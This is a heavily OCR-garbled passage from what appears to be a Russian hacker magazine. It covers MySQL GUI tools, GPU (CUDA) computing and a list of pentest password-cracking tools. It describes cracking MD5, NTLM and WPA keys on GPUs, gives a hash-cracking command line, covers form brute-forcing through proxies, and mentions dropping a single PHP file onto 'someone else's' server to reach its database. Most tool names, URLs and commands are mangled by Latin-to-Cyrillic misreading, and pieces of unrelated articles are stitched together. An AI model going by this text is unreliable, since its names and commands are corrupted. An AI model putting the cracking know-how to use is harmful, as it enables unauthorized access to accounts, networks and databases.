РогіаЫе-вервия 
НеібіБСИ доступна 
для закачки прямо с 
офсайта. 




> СІѴСІ 



Подборка программ 
и скриптов для мани- 
пулирования данными 
в базах МуЗОБ будет 
ждатьтебя на нашем 
БУй-диске. 




[ НТТР://ѴѴѴШ 

1 Г 

> Ііпкз 

Другие аналогичные 
программы, не во- 
шедшие в наш обзор. 

• Му5СП_еіЛТооІ5: 
беѵ.тувдБсот/ 
сіоѵѵпіоасіз/диі-іооіз . 

• Тоаб бог МуЗОБ: 
ѵѵѵѵѵѵ.іюабзоіісопп/ 
ІоабтуздБ 

• ЕМ5 501 Мападег 
іюг Му50І_: 
здітападег.пеі:/ 
еп/ргобисІз/туздіѴ 
тападег . 
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РЕЗУЛЬТАТ РАБОТЫ ПРОФАЙЛЕРА: 
ВЫЧИСЛЯЕМ САМЫЕДОРОГИЕОПЕРАЦИИ 
ЗАПРОСА 



СИСТЕМА ВКЛАДОК 50І.Ѵ00 ПОЗВОЛЯЕТ 
ВЫПОЛНЯТЬ НЕСКОЛЬКО ЗАПРОСОВ 
ОДНОВРЕМЕННО 

и свежие фичи. Не будем касаться банальных функций, вроде 
создания таблиц и реда жирования их структуры и содержимого 
— смею заверить, реализованы они на самом высоком уровне. 
Классно реализованная система табов позволяет оперировать 
сразу несколькими запросами, а система Зтаіі АиБэсотрІеІю 
помогает составлять запросы и автодополняет имена баз и 
таблиц. К тому же в 5С11_уод встроен профайлер запросов — 
уникальное средство для отладки и оптимизации запросов. 
Профайлер показывает, сколько времени уходит на выполнение 
запроса, раскладывая по полочкам каждую из составляющих 
его выполнения (передача запроса, открытие таблиц, блоки- 
ровка таблиц и Т.Д.]. Таким образом можно выявить наиболее 
дорогие операции и попробовать избавиться от них. Например, 
с помощью создания индекса для нужной таблицы. Или более 
радикально — путем увеличения размера кэша выполнения 
запроса. Таким образом, это еще и отличный способ, чтобы оце- 
нить эффект от изменения тех или иных настроек сервера. 

В ЗОБуод встроен мощнейший механизм для синхронизации 
баз данных, причем управление этим процессом максимально 
упрощено с помощью специального мастера. На разных шагах 
вводится: параметры серверов и баз данных, направление 
синхронизации, сравниваемые поля и т.д. Аналогичным обра- 
зом настраивается и автоматический бэкап по расписанию. 
Сильно радует общая продуманность программы, благодаря 
которой ЗОБуод одинаково успешно могут использовать как 
продвинутые пользователи, которым обязательно придется по 
вкусу, например, редактор хранимых процедур, так и начинаю- 
щие пользователи, в руках которых окажутся простые визу- 
альные средства для составления запросов и проектирования 
структуры базы данных. 

5С11_уод распространяется в двух версиях: бесплатной 
СоттипБу и платной Епіюгргізе-вариации. К сожалению, 
наиболее сочные фишки программы, вроде визуальных 
редаеторов, туннелирования и автодополнения запросов, в 
фриварной версии урезаны, но даже при такой функциональ- 
ности ЗОБуод на две головы выше рбрМуАбтіп. 

0ВР0К6Е БЛЮЮ 

На официальной страничке программы (\ллллл/.беѵагЕсот ] среди 
пользователей — известные бренды: НБасЫ, Нопба, Затзипд, 
ВМѴѴ, Зіетепз. От этого вдвойне приятно, что бЬЕогде Зіюбіо 
абсолютно бесплатна для некоммерческого использования. По 
большому счету это еще один удобный фронтенд для работы 
с базами данных Му50Е. Составлять и выполнять запросы, 
редактировать данные, осуществлять их экспорт и импорт, раз- 
рабатывать 50Е-скрипты и хранимые процедуры — получаем 
стандартный набор функций, даже при качественной реализа- 




НАСТР0ЙКА55Н-ТУННЕЛИНГА В50І.Ѵ06 



ции он мало кого удивит. Но добавь к этому отладчик хранимых 
процедур, визуальный редактор для составления 50Е-запросов, 
классный редактор кода с автодополнением команд и имен баз/ 



|>Аналоги рЬрМуАсІтіп 



Архив рбрМуАбтіп занимает, как минимум, пару 
мегабайт, но что мы получаем после установки? 
Навороченный скрипт, который хотя и проверен 
временем, но чересчур перегружен для комфорт- 
ной работы. К тому же одно дело — установить 
рбрМуАбтіп на своем серваке и совсем другое 
— быстро залить на какой-нибудь левый сервак 
скрипт для быстрого доступа к его БД. В общем, 
даже среди ѵѵеЬ-решений есть несколько других 
достойных инструментов, заслуживающих внима- 
ния. 

ЗОЕ Виббѵ (ѵѵѵѵѵѵ.здІЬиббѵ.сопп] — классная РНР- 
оболочка для быстрого доступа к базе данных. 
Главная фишка ЗОБ Виббу — поддержка А]ах, 
позволяющая просматривать и редактировать 
данные в базе без перезагрузки страницы (что 
дико надоедает в рбрМуАбтіп]. В основе лежит 
баѵаЗгірі-фреймворк МооТооІз, поэтому скрипт 
отлично чувствует себя под всеми современными 
браузерами. Установить скрипт проще простого: 
достаточно залить файлы ЗОБ Виббу на сервер. 
Р5Т МуЗОБ 2.0 (гзЕдбс.ги] — наилучший вари- 
ант, если необходимо посмотреть базу данных на 
каком-нибудь левом сервере. В одном единствен- 
ном РНР-файле, размером в 80 Кб, разработчики 
смогли реализовать полноценную утилиту для 
работы с МуЗОБ. Залив этот небольшой файлик, ты 
сможешь обратиться к любым базам и таблицам, 
выполнить произвольный запрос, отредактировать 
данные или сделать дамп. 



► 026 
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ВОДНОМ ЕДИНСТВЕННОМ РНР- 
ФАЙЛЕ 
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таблиц — и возможно, ничем другим пользо- 
ваться ты уже не захочешь. 

Ручная отладка хранимых процедур и 
триггеров с промежуточными выводами и 
вычислениями в голове, возможно, и отдает 



олдскульной романтикой, но в большинстве 
случаев дико тормозит разработку. Зато 
шикарный отладчик хранимых процедур, 
встроенный в сІЬРогде Біисііо, — выше вся- 
ческих похвал. Прямо в редакторе кода 



можно в нужном месте установить точки 
останова, провести выполнение всей или 
части процедуры по шагам, и на каждой 
итерации отслеживать значения переменных 
и результатов выполнения запросов. Кстати 
говоря, ЗОЬ-запросы вовсе необязательно 
набирать вручную — к твоим услугам специаль- 
ное визуальное средство. Оно вряд ли поможет, 
если нужно сварганить действительно сложный 
запрос, но зато окажет неоценимую помощь тем, у 
кого с 50І_ пока не лады. 

Вообще визуальные средства и в особенности 
конструктор базы данных — один из главных 
козырей сІЬРогде БШсГю. Если нужно быстро 
сварганить базу, то лучшего решения, пожалуй, 
не найти. Помещаешь на рабочей области раз- 
ные сущности, устанавливаешь связи между 
ними, редактируешь параметры полей — и база 
готова к использованию. Примечательно, что 
прямо из визуального конструктора можно обра- 
титься к любому элементу базы, будь это обычное 
поле таблицы или же хранимая процедура. 

Очень удобно использовать уже тогда, когда база 
готова, но нужно быстро найти и подправить 
один из ее элементов — лично я так и делаю. 
сІЬРогде Біисііо может похвастаться продвинутым 
экспортом данных. Мастер экспорта позволит 
выбрать нужные столбцы и колонки, задать раз- 
личное отображение данных и преобразовать 
данные в один из следующих форматов: Техр 
ОВР, НТМЬ, МБ Ассезз, МБ Ехсеі, СЮВС, РОЕ, 
РТР, С5Ѵ и ХМЕ. 

Важный момент — подключение к базе данных. 
Честь и хвала разработчикам, которые не поле- 
нились реализовать возможность одновремен- 
ного подключения к разным серверам, причем 
помимо прямого коннеета поддерживается тун- 
нелирование через по БББ, 55Н и НТТР. 

«А НИЧЕГО 

ЛИ ВЫ НЕ ЗАБЫЛИ?» 

Возможно, прочитав материал, кто-то удивиться: 
«А как же программа ІЧаѵісаІ: или какая-нибудь 
еще?». Но мы и не ставили цель рассказать 
обо всех решениях сразу и осознано обходили 
стороной коммерческие продукты (как Ыаѵісаі:]. 
Вместо этого мы хотели поделиться опытом, 
рассказать какие решения и когда нам при- 
годились. И самое главное — открыть глаза 
тем, ето по-прежнему использует один лишь 
рЬрМуАбтіп, отказывая себе в использовании 
отличных инструментов, □с 



► Решение под І_іпих и Мае 05 



Благодаря системе подключаемых плагинов, БОиІггеБ БОБ Сііепі [ ѵѵѵѵѵѵ.гд и іггеігд І.огд] 
поддерживает самые разные базы данных (Огасіе, МуБОБ, Роз^дгеБОБ, ІВМ 0В2 — 
всего более 20]. Собственно для начала работы необходимо выбрать нужный драйвер 
(плагин) и создать так называемый алиас — набор настроек для подключения к сер- 
веру. Но самая главная фишка в том, что беличий клиент написан на Чаѵа и поэтому 
отлично запускается под любой платформой: как под виндой, так линуксом и макосью. 
Впрочем, универсальность — это не единственный конек. Помимо приятного просмот- 
рщика таблиц, в проге реализованы несколько визуальных инструментов, с помощью 
которых, например, можно построить граф, отображающий связи между таблицами. 
Очень качественно выполнен и редактор запросов, в арсенале которого есть и под- 
светка синтаксиса, и встроенный ІпІеШБепзе (достаточно нажать (СМ + Брасе] для 
автодополнения названий таблиц или команд), ускоряющие процесс написания запро- 
сов. Чтобы быстро просмотреть список всех доступных функций, достаточно нажать 
(СМ + I]. Более того, редактор поддерживает шаблоны. Например, если лень каждый 
раз набирать ручками конструкции типа СВЕАТЕ ТАВЕЕ или I N 3 ЕРТ ѴАЕЕІЕБ, то можно 
воспользоваться соответствующими сниппетами. Нужно лишь нажать (СМ + \) и в 
появившемся списке выбрать интересующую тебя конструкцию. Если встроенных 
шаблонов недостаточно, то ничто не мешает пользователю составить свои собствен- 
ные. По аналогии с офисными пакетами редактор поддерживает проверку синтаксиса 
и аббревиатур. Если в скрипте написать «5Р», то программа предложит заменить это 
на «БЕЕЕСТ * РВОМ», «РОВМ» заменит на «РВОМ» и т.д. 
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КАТИТСЯ МИР? 




ПАРАЛЛЕЛЬНЫЕ ВЫЧИСЛЕНИЯ С ИСПОЛЬЗОВАНИЕМ 
ВИДЕОКАРТЫ 



С тех пор, как на графических процессорах стали доступны неграфи- 
ческие вычисления, многое изменилось. Известен не один пример 
того, как кластер из нескольких машин с мощными видеокартами мог 
поспорить с бешено дорогими суперкомпьютерами. За счет чего по- 
лучается такой прирост производительности и так л и все просто на 
самом деле? 



О возможности задействовать процессор 
видеокарты (6РУ) для неграфических 
вычислений говорили давно. Впервые 
архитектура СББА (Сотрите БпібесІ Оеѵісе 
АгсЬіІесІиге) появилась в феврале 2007 
года, предоставив программистам возмож- 
ность использовать технологию О РѲ РЦІ 
(Сепегаі-Ригрозе сотрибпд оп СгарЫсз 
Ргосеззіпд БпіЫ, благодаря которой на 
привычных языках высокого уровня (пре- 
жде всего — Си] можно реализовывать 
алгоритмы, которые выполняются на графи- 
ческих ускорителях СеРогсе восьмого поко- 
ления и старше. Видеоадаптер с поддерж- 
кой СББА становится мощной программи- 
руемой архитектурой, подобно сегодняшим 
центральным процессорам. 

СІЮА НА ПАЛЬЦАХ 

Бонусом за использование СРІІ стала 
появившаяся у разработчиков и невидан- 
ная досели степень параллелизма: воз- 
можность запустить процесс в десятках и 
сотнях тысяч потоков! 

Справедливости ради стоит сказать, что 
такие потоки достаточно сильно отличаются 
от потоков СРБ, но СІЮА всеми силами 
пытается скрыть от разработчика слож- 
ность их использования. Но несмотря на 
относительную простоту внедрения, взять 
и увеличить производительность любого 



приложения в N раз не выйдет. Благодаря 
СІЮА возможно оптимизировать лишь ту 
частью приложения, которую можно рас- 
параллелить, а это, увы, далеко не всегда 
очевидная задача. 

Давай разберемся, в чем отличается основ- 
ной процессор системы (СРІЛ и процессор 
видеокарты? Важно понимать, что СРБ 
изначально приспособлен для решения 
задач общего плана и работает с произ- 
вольно адресуемой памятью. Программы на 
СРБ могут обращаться напрямую к любым 
ячейкам линейной и однородной памяти. 
Сравни это с СРІІ, где используется сразу 
пять видов пямяти. Но и тут СІЮА делает 
все, чтобы помочь программисту, позволяя 
процессам в рамках одного блока работать 
с общей памятью. 

Извечная проблема большинства вычис- 
лительных систем заключается в том, что 
память работает медленнее процессора. 
Чтобы нивелировать это недостаток, про- 
изводители СРІІ используют кэш-память, 
работающую на частоте процессора. Таким 
образом, удается сэкономить время при 
обращении к наиболее часто используемым 
данным. На современных графических про- 
цессорах также есть система кеша, но она 
не такая мощная, как на СРІІ. Поэтому на 
ОРИ медленные обращения к памяти скры- 
вают, используя параллельные вычисления. 



Пока одни задачи ждут данных, работают 
другие, готовые к вычислениям. Это один 
из основных принципов СІЮА, позволяю- 
щих сильно поднять производительность 
системы в целом. 

Вычислительная архитектура СІЮА осно- 
вана на концепции — одна команда на мно- 
жество данных (Эіпдіе Іпзітисбоп МиШрІе 
Ба1:а, 51МБ) и понятии мультипроцессора. 
Концепция 51МБ подразумевает, что одна 
инструкция позволяет одновременно обра- 
ботать множество данных. Мультипроцессор 
— это многоядерный 5ІМБ-процессор, 
позволяющий в каждый определенный 
момент времени выполнять на всех своих 
ядрах только одну инструкцию. 

Важно понимать, что использовать мощ- 
ности графического процессора уместно 
далеко не всегда. СРБ предназначен для 
вычислений с большим параллелизмом 
и интенсивной арифметикой. Это объ- 
ясняется тем, что у него гораздо большее 
число транзисторов отведено на обработку 
данных, а не на управление исполнением 
Фоѵѵ сопітоі). Поэтому СРБ демонстриру- 
ют хорошие результаты в параллельной 
обработке данных, когда с помощью одной 
и той же последовательности действий 
обрабатывается большой объем данных. 
Именно по этой причине всю мощь от 
использования СББА можно ощутить, когда 
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СХЕМАВЗАИМОДЕЙСТВИЯ МЕЖДУ СРЫ И 6РІІ. (і КОПИРУЕМ ДАННЫЕ ИЗ ОСНОВНОЙ ПАМЯТИ В ПА- 
МЯТЬ ВИДЕОКАРТЫ. ПЕРЕДАЕМ УПРАВЛЕНИЕ ѲРШ 6РІІ ВЫПОЛНЯЕТ КОМАНДУ ПАРАЛЛЕЛЬНО 
В КАЖДОМ ЯДРЕ. (4) КОПИРУЕМ РЕЗУЛЬТАТ ИЗ ПАМЯТИ ВИДЕОКАРТЫ В ОСНОВНУЮ ПАМЯТЬ 



требуется выполнять одни и те же действия 
над огромными массивами данных (пример: 
локальный брутфорс чего-либо]. 

УСТАНОВКА СІША 
В СИСТЕМУ 

До недавнего времени О РЦІ могли про- 
граммироваться только посредством специ- 
альных графических АРІ. Отсюда вытекали 
и недостатки в лице длительного времени, 
которое требовалось для его изучения, а 
также накладных расходов, возникающих за 
счет использования промежуточного звена. 
США представляется для программиста в 
виде расширения для привычных языков 
программирования, а поэтому изучить его 
намного проще. Вообще, все что нужно, 
для того чтобы начать использовать США 
— обзавестись соответствующим 50К и 
скачать с официального сайта ІМѴЮІА драй- 
вер США, который связывается с ОігесіХ, 
ОрепСІ_ и С-компилятором для ОРИ 
Разработчику дополнительно потребуется 
установить специальную среду разработки 
США ТооІкіС Не составит труда установить 
США и на І_іпих, например на самом офи- 
циальном сайте есть подробные инструкции 
по установке США на ІІЬипІи. 

В систему устанавливается все необходи- 
мое для работы с США, включая гипііте 
и компилятор пѵсс. Причем сам компиля- 
тор фактически представляет собой пре- 
процессор, обрабатывающий исходник и 
строящий отдельный код для 6РІІ и СРСІ. 



Для компиляции кода для С РЦІ (включая 
код, необходимый для запуска ядра] пѵсс 
использует обычный С/С++ компилятор (на 
Ыпих’е он использует дсс]. Теперь давай, 
наконец, посмотрим, где сейчас можно оце- 
нить эффект от внедрения вычислений на 
видеоадаптерах. Главное, помни два важ- 
ных требования для использования США: 

1) Наличие видеоадаптера ОеРогсе 8-й 
серии и старше (подробнее во врезке); 

2 ) 512 Мб видеопамяти на борту. 

ТРИ К 1: РАСПРАВЛЯЕМСЯ 
С Мй5 

Первое и самое простое из того, что можно 
сделать, чтобы проверить функциональ- 
ность США, — попробовать пробрутить 
какой-нибудь хеш и сравнить результа- 
ты с теми, что дают утилиты из нашего 
брутфорс-набора (читай статью «Лучшие 
инструменты пентестера»]. Одна из таких 
утилит — ВагзѴѴР ( ШрѴ/З. 1 4.Ьѵ/ги/тсІ5 ). 
разработкой которой занимается Михаил 
Сварчевский. На текущий момент разра- 
ботчиком достигнута скорость перебора, 
равная 350 миллионам ключей в секунду. 
Синтаксис для запуска следующий: 

ВагзШ 1 _53Е2_х64 . ехе -Ъ. 

2 16 85(12 82(179 09 8Ь89ЬШ5 а916Ь6 6с9 0 
-X «030405313233» -шіп_1еп 12 

Ключ «-Х» добавляет дополнительные зна- 
чения для перебора, «-тіп_1еп» обозначает 



минимальную длину пароля (она должна 
быть не более 15]. Перед запуском не 
поленись скачать самый последний драй- 
вер с поддержкой США ( ѵѵѵѵѵѵ.пѵісііа.сопп/ 
оЬ|есі:/сисІа деСЫтП или АІШ/Вгоок, если 
используешь видюху на базе АМО Ыі.атсІ. 
сот/зиррогі/сІгіѵег.ЫтІ ). 

Для взлома хешей с использованием США 
есть и другие проекты: Ѵегпоих М65 сгаск 
( ЬѵегпоихТгееТг/тсІб/іпсІех.рЬр ]. ЫдЫпіпд 
НазЬ Сгаскег ( ѵѵѵѵѵѵ.еІсоппзоЛ.сопп/ІЬс. 

Мті], сиІШ5 Логитз.пѵісііа.сопп/іпсіех. 
р Ні р?5 Ь оѵѵіо р і с=7 1 548 ]. пѴСисІа_ппсІ5 Логит. 
апІісбаРгиЛЬгеаб62728.Ьіт[ ]. ІпзісІеРго ЕОВ 
( ѵѵѵѵѵѵ.іпзісІерго.сот/епд/едЬ.зЫтІ ]. 

ТРИК 2: БРУТИМ СЛОЖНЫЕ 
ХЕШИ 

Хорошо, с ІШ5 разобрались. А как быть с 
другими хешами? Тут тебе в помощь — спе- 
циальная версия РаіпЬоѵѵсгаск ( іщесЩ 
гаіпЬоѵѵсгаск.сот ]. заточенная под США. 
Программа не только оптимизирована для 
работы на многопроцессорных системах, но 
еще и эффективно использует возможности 
современных ОРУ. 

Только вдумайся в цифры: для І\ІТІ_М-хеша 
скорость перебора, используя мощности 
графического процессора, составляет 
500 миллионов паролей в секунду. А если 
вместо брутфорса использовать гаіпбоѵѵ- 
таблицы, получаем вообще астрономиче- 
скую цифру: почти 73904 миллионов паро- 
лей в секунду! 
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> іпГо 



У компании АТІ также 
есть аналогичный 
проект, который на- 
зывается АТІ-Эігеапп. 
ІЧѴЮІА, АТІ и ряд 
других компаний ра- 
бота ют над открытым 
стандартом ОрепСІ_. 
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> Ііпкз 

• Библиотека 
ІСІЮАдля работы 
с СІЮА для Оаѵа- 
программистов: 
ѵѵѵѵѵѵ.дазв-иб.со.іі/ 
еп/ргосіисіз/щисіа . 
•Модуль СІЮА для 
Руібоп : 

таіЬета.Іісіап.бе/ 

зоЮл/аге/русиба . 

• Реализация для 
. N ЕТ : 

ѵѵѵѵѵѵ.дазз-иб.со.іі/ 

еп/ргобисіз/сиба.пеі 




> іпіо 

Вся информация 
представлена в озна- 
комительных целях. 



В КАШВОѴѴСКАСК ВХОДЯТ ТРИ УТИЛИТЫ, КОТОРЫЕ 
НУЖНО ИСПОЛЬЗОВАТЬ В СЛЕДУЮЩЕМ ПОРЯДКЕ: 

ШАГ 1 . Сначала с помощью тулзы гСдеп генериру- 
ются га і п Ьоѵѵ-та блицы; 

ШАГ 2. Далее с помощью гсзогс осуществляется 

специальная сортировка сгенерированных таблиц; 

ШАГ 3. В конце концов, используется тулза гсгаск 

для поиска значения хеша в таблице. 

Увы, бесплатная версия РаіпЬоѵѵсгаск не позволяет 
полностью насладиться всеми благами СІЮА. 

ТРИ К 3: ВОССТАНАВЛИВАЕМ 
ПАРОЛИ 

Программа 0 ізТгі Ь иТесІ Раззѵѵогб Ресоѵегу [ ѵѵѵѵѵѵ. 
еІсотзоЙ.сот/ебрг.ЫппІ ) предназначена для рас- 
пределенного нахождения забытых паролей к раз- 
личным типам документов, причем некоторые из 
алгоритмов оптимизированы для использования 
СІЮА-ускорения. Повезло тем, кто забыл пароль 
от документов ѴѴогб 2007, Ехсеі 2007, РоѵѵегРо і пТ, 
РпДесІ: 2007, а также для своей учетки в ѴѴіпсІоѵѵз 
(І_М/І\ІТІ_М). Технология ускорения на ОРІІ освобож- 
дает СРІЭ от наиболее ресурсоемких частей алгорит- 
ма, перенося их на СІЮА-совместимые графические 
процессоры. 

Требования к видеокартам просты: главное, чтобы 
объем видеопамяти был не менее 256 Мб. ЕБРР 
состоит из трех компонентов: сервер, агент и кон- 
соль. Сервер устанавливается на один из компью- 
теров в сети, он управляет процессом перебора 
паролей. На остальные компьютеры в сети устанав- 
ливается агент, перебирающий порции паролей. По 
заявлению разработчиков, система с несколькими 
видеокартами ІЧѴЮІА способна перебрать до 1 млрд, 
паролей в секунду. Прирост быстродействия по срав- 
нению с универсальными процессорами достигает 
десятков раз. 

ТРИК 4: УСКОРЯЕМ КОДИРОВАНИЕ 
ВИДЕО 

С самого начала появления технологии СІЮА говорили 
о вполне логичном ее применении в сложных про- 
цессах по кодированию видео. Пионером в мире СІЮА 
стала приятная программа ВабаЬоот [ ѵѵѵѵѵѵ. баба ЬоотіР 
сот ), которая отличалась максимальной простотой 
использования. Указываешь ей файл с исходным видео 
и целевое устройство (например, телефон или видеохо- 
стинг ѴоиТиЬе) после чего получаешь оптимизировнный 
файл ,тр4. 



Реѵісе 



КетеІ X 



еигі 1 






ВІоск 


ВІоск 


ВІоск 


СО, о) 


(1,0) 


(2,0) 


ВІоск 


ВІоск 


ВІоск 


[0, 1 У 


Сі,1) 


< (а ' 



Кешеі 2 




ВІоск (і, 1) 



ТІігеасІ 
№ 0) 


ТЬгеагі 
(1, 0) 


ТІіігеасІ 

ао) 


ТІігедгі 

(3,0) 


Т1ігеэ<1 

(4.0} 




ТІігеагІ 

(и) 


ТіігелсЗ 

(2, X) 


"Пігдаиі 
(3, 1) 


ТІіпеагі 
И, 1) 


сою 


ТИгеасІ 
Ш, а) 


Ііігеай 

а 2) 


ТГігеа<І 

а 2) 


ТІігеай 

13,2) 


ТИгеасІ 
(4, 2) 




ПРОЦЕССЫ ОБЪЕДИНЯЮТСЯ В БЛОКИ 
(ВІ.0СК5), ВНУТРИ КОТОРЫХ ИМЕЮТ 
ОБЩУЮ ПАМЯТЬ (5НАКЕ0МЕМ0КѴ) 

И СИНХРОННОЕ ИСПОЛНЕНИЕ. 

БЛОКИ ОБЪЕДИНЯЮТСЯ В СЕТКИ (6КШ5) 



ВабаЬоот не просто использует для работы СІЮА: 
без подходящего видеоадаптера, поддерживающе- 
го эту архитектуру, она вообще откажется работать. 
Вместо традиционного использования СРІЧ, утилита 
всеми силами пытается использовать возможность 
по параллелизации процессов на ІЧѴЮІА СРІІ, чтобы 



> Какие видюхи подходят 
для использования СОРА? 



Полный перечень графических адаптеров, под- 
держивающих технологию СІЮА, приведен на 
официальном сайте ІЧѴЮІА: ѵѵѵѵѵѵ.пѵісІіа.соппЛзЬіесі:/ 
сисіа Іеагп ргобисІз.ЫппІ. . Это практически все 
модели ОеРогсе ОеРогсе 8, 9, 100, 200 серий, 
а также ІЧѴісІіа Тезіа и ІЧѵісІіа Оиабго. 
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^ Со Васк ^ ІпяаІІ 



оптимизировать процесс кодирования. 
Благодаря этому удается не только сэко- 
номить время, но и существенно разгру- 
зить процессор. Прослеживается зако- 
номерность: чем выше выбрано качество 
кодирования, тем сильнее прога нагружа- 
ет ОРИ, позволяя СРІЧ заниматься своей 
работой. Покажи мне еще одну программу, 
которая позволяет во время ресурсоемко- 
го кодирования видео полноценно рабо- 
тать с компьютером! Следует отдать долж- 
ное разработчикам за добавление функ- 
циональности тиШ-ЭРІІ. Распределить 
одну задачу по нескольким 6РІІ, увы, не 
удастся, но зато можно запустить по одной 
копии программы для каждого СРІЧ в 
системе — удобная функция, если нужно 
переконвертировать много файлов. 

Само собой, на одной только ВабаЬоот 
список программ, работающих с видео и 
поддерживающих архитектуру СІЮА, не 
заканчивается. Небезызвестный видео- 
редактор СуЬегЫпк РоѵѵеЮігесІюг [ ѵѵѵѵѵѵ. 
сѵЬегІіпк.сот ) позволяет существенно 
оптимизировать обработку эффектов. 

А популярный перкодировщик ТМРСЕпс 
[ ѵѵѵѵѵѵ.ітраепс.пеі: ) также поможет основ- 
ному процессору быстрее расправиться с 
включенными во время кодирования филь- 
трами. 



ТРИК 5: БЫСТРЫЙ 
ВЗЛОМ ѴѴРА 

Пару номеров назад мы рассказывали 
о разработке компании ЕІсотзоіТ — 
Еісотзоіі ѴѴігеІезз Сесигбу АибЕог, кото- 
рая использует СІЮА во время брутфорса 
ключа для ѴѴРА-сети и позволяет добиться 
производительности в 10-15 раз быстрее, 
чем на обычном 4-х ядерном процессоре. 

К сожалению, триальная версия продукта 
найденный ключ не скажет (жадина такая], 
поэтому мы решили поискать альтернатив- 
ные варианты. 

Работая как-то в Васкігаск Еіпих я обратил 
внимание на специальную специальную 
версию аігсгаск’а — аігсгаск-пд-сиба, кото- 
рая использует СІЮА и изначально предна- 
значена только для для взлома ѴѴРА. Если 
взять машину с СТХ 285, можно добиться 
скорости перебора влоть до 6-7 тысяч клю- 
чей в секунду. Примерно в два раз больше, 
чем на обычном аігсгаск. 

Еще большей эффективности при подбо- 
ре ключа для ѴѴРА-Р5К можно добиться с 
помощью связки ругіі; [ собе.доодіе.сот/р/ 
ругіі ] и соѴѴРАНу [ ѵѵѵѵѵѵ.ѵѵіиЬаскЬгзизЫ. 
сот ). Чрезвычайно высокую скорость 
перебора удается достичь за счет пред- 
варительной генерации вспомогательной 
таблицы с РМК-ключами, которые исполь- 



зуются во время авторизации клиента с 
точкой доступа. Благодаря тому, что ругіі; 
использует возможности Ыѵібіа СІЮА (а 
также смежных технологий АТІ-5ігеат, 
ОрепСБ, ѴІА РасІІоск] скорость генерации 
таблицы может достигать 20 тысяч РМК- 
ключей в секунду на одном СеЕогсе СТХ 
295 и до более чем 80 тысяч ключей, если 
используется четверо таких видеадаптеров. 
На ѴоиТиЬе есть ролик, в котором демон- 
стрируется кластер, собранный из 15 
компьютеров с СеЕогсе 8800 СТ на борту, 
а параллелизация достигнута с использо- 
ванием проекта трі4ру [ трі4рѵ.5сірѵ.огд ]. 
Чтобы не вылезать за рамки статьи, под- 
робные инструкции (правда, на английском 
языке], как по использованию аігсгаск-пд, 
так и ругіІ+ соѴѴРАНу, ты найдешь на нашем 
диске. 

НЕ ПАНАЦЕЯ 

Нужно понимать, что СІЮА не панацея. 
Нельзя просто взять приложение, добавить 
к нему модуль СІЮА и получить супер- 
быстрое приложение. Разработчикам при- 
ходится немало потрудиться, чтобы выде- 
лить части приложения, которые возможно 
распараллелить. Но ради колоссального 
прироста производительности на доступ- 
ном железе можно пойти и не на такоеі^с 
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ЛУЧШИЕ ИНСТРУМЕНТЫ ПЕН-ТЕСТЕРА 

БРУТФОРС И ВОССТАНОВЛЕНИЕ ПАРОЛЕЙ 

і У каждого из команды □с свои предпочтения по части софта и утилит для пен-теста. Посовещавшись, 
мы выяснили, что выбор так разнится, что можно составить настоящий джентльменский набор из про- 
веренных программ. На том и решили. Чтобы не делать сборную солянку, весь список мы разбили на 
темы - и в этот раз коснемся утилит для подбора пароля к различным сервисам. 



!-► иіиз АЕТ2 

Платформа: ѴѴІпсІоѵѵз 

Последний релиз программы был в 2000 году. 

У тулзы давно нет официального сайта. Но при 
этом ВгиШз АЕТ2 по-прежнему является одним 
самых шустрых и продвинутых брутфорсеров 
для основных интернет-протоколов. Если нужно 
подобрать пароль для НТТР (на тех страничках, 
где используется авторизация по логину/паро- 
лю], произвольному веб-сервису с авторизацией 
через форму почтовому аккаунту, файловому 
или Теіпеі: серверу, знай: ВгиШз — отличный 
вариант. 

В общем случае для подбора пароля нужно 
указать хост и порт сервиса, выбрать протокол, 
установить количество используемых потоков 
(максимум — 60], а также таймаут. В целях ано- 
нимности можно подключить соке или прокси. 

В зависимости от протокола также указывается 

СТАРИЧОК ВВІІТІІ5 ЕЩЕ В ТОНУ- 
СЕ И ПО-ПРЕЖНЕМУ ОТЛИЧНО 
СПРАВЛЯЕТСЯ СО СВОЕЙ РАБОТОЙ 




ряд дополнительных параметров. Например, 
для подбора пароля на каком-то сайте (тип брут- 
форса — НТТР Рогт) необходимо указать метод 
(Р05Т или СЕТ), обозначить параметры формы 
(в ВгиШз встроено простое средство для их 
анализа], а в случае необходимости — подделать 
соокіе, включив соответствующую опцию. 

Подбор осуществляется двумя способами: по 
словарю, причем у проги есть несколько встро- 
енных утилит для работы с большими списками 
паролей, или же с использованием тупо сге- 
нерированных паролей. В последнем случае 
необходимо обозначить символы, которые будут 
использоваться для составления пасса. 

► Универсальный брутфорсер для протоколов 
НТТР РОВМ, ТЕЬМЕТ, РОРЗ, РТР 

БЛАГОДАРЯ ЭТОМУФРОНТ- 
ЕНДУ, РАБОТАТЬ С .ІОНЫТНЕ 
КІРРЕК МОЖЕТ КАЖДЫЙ 




-►Зоііп ІІіе Ріррег 

ѵѵ ѵѵѵѵ. о р е п ѵѵа II . с о т !\ о И п 
Платформа: ѴѴІпсІоѵѵз, Ыпіх 

Пытливые умы программистов не раз задумыва- 
лись о том, как защитить пароли, которые хра- 
нятся локально. Действительно, ведь если есть 
доступ к машине, значит, пользователь может 
найти то местечко в системе, где они хранятся 
и... обломаться, увидев вместо паролей — их 
хеши. Исходные пароли пропускают через спе- 
циальные функции, которые выдают на выходе 
уникальную последовательность символов (хеш], 
причем обратное преобразование произвести 
невозможно. Когда во время входа в систему 
пользователь вводит пароль, ось производит 
аналогичное действие и сравнивает полученный 
хеш с тем, что хранится в ее недрах. 

Так, что же, нет способа отыскать локальный 
пароль в никсах или ѴѴІпсІоѵѵз? Есть, если взять 
в помощники тулзу ^оЬп ТЬе Ріррег, которая как 
раз и занимается восстановлением паролей по 
их хешам. Основная задача тулзы — аудит сла- 
бых паролей в ІІІМІХ-системах, но также справ- 
ляется и с І\ІТІ_М-хешами, которые используются 
для хранения паролей под виндой, КегЬегоз, 
и некоторыми другими. Причем к программе 
можно подключить модули, предоставляющие 
поддержку М 04-хешей, ШАР и МуЗОБ-паролей. 
ЭоЬп ТЬе Ріррег может проводить атаку по сло- 
варю и брутфорс. В режиме атаки по словарю 
программа берет предполагаемые пароли из 
указанного файла, генерирует хеш и сверяет его 
с эталонным. В режиме бругфорса программа 
перебирает все возможные комбинации пароля. 
Сама тулза работает через консоль, а настройки 
для брута передаются с помощью целого ряда 
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опций и параметров. Впрочем, если не жаждешь 
разбираться с многочисленными ключами, то 
можно немного схалтурить, воспользовавшись 
замечательным 0111-интерфейсом от стороннего 
